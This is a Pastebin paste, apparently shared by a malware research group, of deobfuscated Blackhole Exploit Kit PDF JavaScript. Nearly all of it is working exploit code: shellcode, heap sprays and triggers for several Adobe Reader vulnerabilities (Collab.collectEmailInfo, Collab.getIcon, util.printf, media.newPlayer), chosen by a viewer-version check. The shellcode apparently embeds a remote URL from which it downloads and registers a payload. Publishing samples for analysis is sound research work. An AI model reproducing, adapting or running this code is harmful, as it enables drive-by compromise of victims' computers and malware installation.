SHARE
TWEET

BHEK 2013-5

MalwareMustDie Jan 2nd, 2013 202 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //shellcode strings.... bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u392f%u2e33%u3931%u2e30%u3434%u312e%u3737%u632f%u6f6c%u6573%u7473%u392f%u7938%u3866%u3139%u6633%u696a%u6770%u696a%u6c61%u6768%u3238%u3933%u676a%u6769%u6e68%u686a%u6934%u6b36%u6f35%u702e%u7068%u703f%u6676%u6472%u333d%u3a30%u6e31%u313a%u3a69%u6931%u333a%u2633%u7a75%u7868%u3d70%u6b31%u313a%u3a66%u7732%u313a%u3a6d%u3133%u313a%u3a6f%u6c31%u313a%u3a6c%u3033%u333a%u2631%u7179%u3d71%u6831%u6a26%u636b%u616c%u6d75%u3d6f%u6c65%u786e%u2665%u696a%u7a65%u636f%u676c%u793d%u6864%u006f%u0000';
  2. // Two exploit of
  3. //(1) Collab.getIcon Exploit CVE-2009-0927 , and
  4. //(2) Collab.collectEmailInfo CVE-2007-5659
  5.  
  6.  function ezvr(ra,qy)
  7.  {
  8.    while(ra.length*2<qy)
  9.    {
  10.      ra+=ra
  11.    }
  12.    ra=ra.substring(0,qy/2);
  13.    return ra
  14.  }
  15.  function bx()
  16.  {
  17.    var dkg=new Array();
  18.    var vw=0x0c0c0c0c;
  19.    var addr=0x400000;
  20.    var payload=unescape(bjsg);
  21.    var sc_len=payload.length*2;
  22.    var qy=addr-(sc_len+0x38);
  23.    var yarsp=unescape("%u9090%u9090");
  24.    yarsp=ezvr(yarsp,qy);
  25.    var count2=(vw-0x400000)/addr;
  26.    for(var count=0;count<count2;count++)
  27.    {
  28.      dkg[count]=yarsp+payload
  29.    }
  30.    var overflow=unescape("%u0c0c%u0c0c");
  31.    while(overflow.length<44952)
  32.    {
  33.      overflow+=overflow
  34.    }
  35.    this.collabStore=Collab.collectEmailInfo(
  36.    {
  37.      subj:"",msg:overflow
  38.    }
  39.    )
  40.  }
  41.  function printf()
  42.  {
  43.    nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  44.    var payload=unescape(bjsg);
  45.    heapblock=nop+payload;
  46.    bigblock=unescape("%u0A0A%u0A0A");
  47.    headersize=20;
  48.    spray=headersize+heapblock.length;
  49.    while(bigblock.length<spray)
  50.    {
  51.      bigblock+=bigblock
  52.    }
  53.    fillblock=bigblock.substring(0,spray);
  54.    block=bigblock.substring(0,bigblock.length-spray);
  55.    while(block.length+spray<0x40000)
  56.    {
  57.      block=block+block+fillblock
  58.    }
  59.    mem=new Array();
  60.    for(i=0;i<1400;i++)
  61.    {
  62.      mem[i]=block+heapblock
  63.    }
  64.    var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
  65.    util.printf("%45000f",num)
  66.  }
  67.  function geticon()
  68.  {
  69.    var arry=new Array();
  70.    if(app.doc.Collab.getIcon)
  71.    {
  72.      var payload=unescape(bjsg);
  73.      var hWq500CN=payload.length*2;
  74.      var qy=0x400000-(hWq500CN+0x38);
  75.      var yarsp=unescape("%u9090%u9090");
  76.      yarsp=ezvr(yarsp,qy);
  77.      var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;
  78.      for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++)
  79.      {
  80.        arry[vqcQD96y]=yarsp+payload
  81.      }
  82.      var tUMhNbGw=unescape("%09");
  83.      while(tUMhNbGw.length<0x4000)
  84.      {
  85.        tUMhNbGw+=tUMhNbGw
  86.      }
  87.      tUMhNbGw="N."+tUMhNbGw;
  88.      app.doc.Collab.getIcon(tUMhNbGw)
  89.    }
  90.  }
  91.  aPlugins=app.plugIns;
  92.  var sv=parseInt(app.viewerVersion.toString().charAt(0));
  93.  for(var i=0;i<aPlugins.length;i++)
  94.  {
  95.    if(aPlugins[i].name=='EScript')
  96.    {
  97.      var lv=aPlugins[i].version
  98.    }
  99.  }
  100.  if((lv==9)||((sv==8)&&(lv<=8.12)))
  101.  {
  102.    geticon()
  103.  }
  104.  else if(lv==7.1)
  105.  {
  106.    printf()
  107.  }
  108.  else if(((sv==6)||(sv==7))&&(lv<7.11))
  109.  {
  110.    bx()
  111.  }
  112.  else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17))
  113.  {
  114.    function a()
  115.    {
  116.      util.printd('p@111111111111111111111111 : yyyy111',new Date())
  117.    }
  118.    var h=app.plugIns;
  119.    for(var f=0;f<h.length;f++)
  120.    {
  121.      if(h[f].name=='EScript')
  122.      {
  123.        var i=h[f].version
  124.      }
  125.    }
  126.    if((i>8.12)&&(i<8.2))
  127.    {
  128.      c=new Array();
  129.      var d=unescape('%u9090%u9090');
  130.      var e=unescape(bjsg);
  131.      while(d.length<=0x8000)
  132.      {
  133.        d+=d
  134.      }
  135.      d=d.substr(0,0x8000-e.length);
  136.      for(f=0;f<2900;f++)
  137.      {
  138.        c[f]=d+e
  139.      }
  140.      a();
  141.      a();
  142.      try
  143.      {
  144.        this.media.newPlayer(null)
  145.      }
  146.      catch(e)
  147.      {
  148.      }
  149.      a()
  150.    }
  151.  }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top